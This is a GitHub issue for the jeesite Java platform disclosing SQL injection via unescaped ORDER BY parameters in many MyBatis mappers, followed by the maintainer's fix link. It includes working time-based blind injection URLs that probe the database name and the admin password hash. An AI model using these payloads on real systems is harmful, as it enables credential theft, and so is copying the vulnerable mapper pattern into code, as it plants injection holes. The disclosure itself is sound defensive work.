search

thinkgem / jeesite

Java rapid development platform, based (Spring Boot, Spring MVC, Apache Shiro, MyBatis, Beetl, Bootstrap, AdminLTE), online code generation, including modules: Organization, role users, menu and button authorization, data permissions, system parameters, content management, workflow, etc. Loose coupling design is adopted; one key skin switch; account security Settings, password policies; Online scheduled task configuration; Support cluster, support SAAS; Support for multiple data sources
http://jeesite.com
Apache License 2.0
8k stars 5.66k forks source link

mybatis orderby sql injection #511

Closed maybe-why-not closed 2 years ago

maybe-why-not commented 2 years ago

sql mappings

jeesite\src\main\resources\templates\modules\gen\dao\mapper.xml:
  106       <choose>
  107           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
  108:              ORDER BY ${"$"}{page.orderBy}
  109           </when>
  110           <otherwise>
  ...
  132       <choose>
  133           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
  134:              ORDER BY ${"$"}{page.orderBy}
  135           </when>
  136           <otherwise>

jeesite\src\main\resources\mappings\modules\sys\UserDao.xml:
  188       <choose>###
  189           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
  190:              ORDER BY ${page.orderBy}
  191           </when>
  192           <otherwise>

jeesite\src\main\resources\mappings\modules\gen\GenTableDao.xml:
   45       <choose>###
   46           <when test="page.orderBy != null and page.orderBy != ''">
   47:              ORDER BY ${page.orderBy}
   48           </when>
   49           <otherwise>
   ..
   60       <choose>
   61           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
   62:              ORDER BY ${page.orderBy}
   63           </when>
   64           <otherwise>

jeesite\src\main\resources\mappings\modules\cms\ArticleDao.xml:
   80       <choose>
   81           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
   82:              ORDER BY ${page.orderBy}
   83           </when>
   84           <otherwise>
   ..
   98       <choose>
   99           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
  100:              ORDER BY ${page.orderBy}
  101           </when>
  102           <otherwise>

jeesite\src\main\resources\mappings\modules\cms\CategoryDao.xml:
   90       <choose>
   91           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
   92:              ORDER BY ${page.orderBy}
   93           </when>
   94           <otherwise>

jeesite\src\main\resources\mappings\modules\cms\CommentDao.xml:
   44       <choose>
   45           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
   46:              ORDER BY ${page.orderBy}
   47           </when>
   48           <otherwise>
   ..
   62       <choose>
   63           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
   64:              ORDER BY ${page.orderBy}
   65           </when>
   66           <otherwise>

jeesite\src\main\resources\mappings\modules\cms\GuestbookDao.xml:
   42       <choose>
   43           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
   44:              ORDER BY ${page.orderBy}
   45           </when>
   46           <otherwise>
   ..
   60       <choose>
   61           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
   62:              ORDER BY ${page.orderBy}
   63           </when>
   64           <otherwise>

jeesite\src\main\resources\mappings\modules\cms\LinkDao.xml:
   51       <choose>
   52           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
   53:              ORDER BY ${page.orderBy}
   54           </when>
   55           <otherwise>
   ..
   69       <choose>
   70           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
   71:              ORDER BY ${page.orderBy}
   72           </when>
   73           <otherwise>

jeesite\src\main\resources\mappings\modules\cms\SiteDao.xml:
   49       <choose>
   50           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
   51:              ORDER BY ${page.orderBy}
   52           </when>
   53           <otherwise>
   ..
   67       <choose>
   68           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
   69:              ORDER BY ${page.orderBy}
   70           </when>
   71           <otherwise>

jeesite\src\main\resources\mappings\jeesite\test\TestDataChildDao.xml:
   46       <choose>###
   47           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
   48:              ORDER BY ${page.orderBy}
   49           </when>
   50           <otherwise>
   ..
   64       <choose>
   65           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
   66:              ORDER BY ${page.orderBy}
   67           </when>
   68           <otherwise>

jeesite\src\main\resources\mappings\jeesite\test\TestDataDao.xml:
   67       <choose>
   68           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
   69:              ORDER BY ${page.orderBy}
   70           </when>
   71           <otherwise>
   ..
   85       <choose>
   86           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
   87:              ORDER BY ${page.orderBy}
   88           </when>
   89           <otherwise>

jeesite\src\main\resources\mappings\jeesite\test\TestDataMainDao.xml:
   58       <choose>
   59           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
   60:              ORDER BY ${page.orderBy}
   61           </when>
   62           <otherwise>
   ..
   76       <choose>
   77           <when test="page !=null and page.orderBy != null and page.orderBy != ''">
   78:              ORDER BY ${page.orderBy}
   79           </when>
   80           <otherwise>

RequestMapping

sys/user/list
gen/genTable/list
gen/genTable/form
gen/genTable/save
gen/genScheme/form
gen/genScheme/save
...

time base sql injection

url:http://192.168.163.1:8088/jeesite_war/a/sys/user/list?orderBy=if(database()!=0x6a656573697465,1,sleep(0.3)) image admin's password url:http://192.168.163.1:8088/jeesite_war/a/sys/user/list?orderBy=if(cu.password!=0x3032613366303737326663636139663431356164633939303733346234356336663035396337643333656532383336326334383532303332,1,sleep(3))&pageSize=1&id=1 image

修复建议

建议orderby的过滤规则和普通过滤分开写,orderby白名单,[a-z0-9_],普通过滤用黑名单

think-gem commented 2 years ago

感谢反馈,已更新:https://github.com/thinkgem/jeesite/blob/master/src/main/java/com/thinkgem/jeesite/common/persistence/Page.java#L449